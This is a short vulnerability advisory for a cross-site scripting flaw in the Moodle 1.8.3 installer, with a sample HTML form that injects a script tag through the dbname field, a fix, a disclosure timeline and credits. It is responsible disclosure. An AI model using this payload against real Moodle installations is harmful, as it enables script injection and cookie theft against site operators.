Cross site scripting (XSS) in Moodle 1.8.3

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0123

Description

Moodle is a course management system for educators.
The installer code is vulnerable to Cross Site Scripting, letting you inject JavaScript and steal cookies. The XSS can only be triggered if there's a not installed moodle, so this can be considered low impact. Still it's possible to attack if an attacker knows from another person installing moodle.

Sample code

Sample XSS code:

<form method="post" action="http://localhost/moodle/install.php">
<input type="hidden" name="stage" value="3">
<input type="text" name="dbname" value='"><script>alert(1)</script>'>
<input type=submit>
</form>
Workaround/Fix

Update to 1.8.4.

Disclosure Timeline

2007-01-08 Vendor contacted
2007-01-08 Vendor fixed cvs
2007-01-11 Vendor released 1.8.4

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0123 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. It's licensed under the creative commons attribution license.

Hanno Boeck, 2008-01-12, http://www.hboeck.de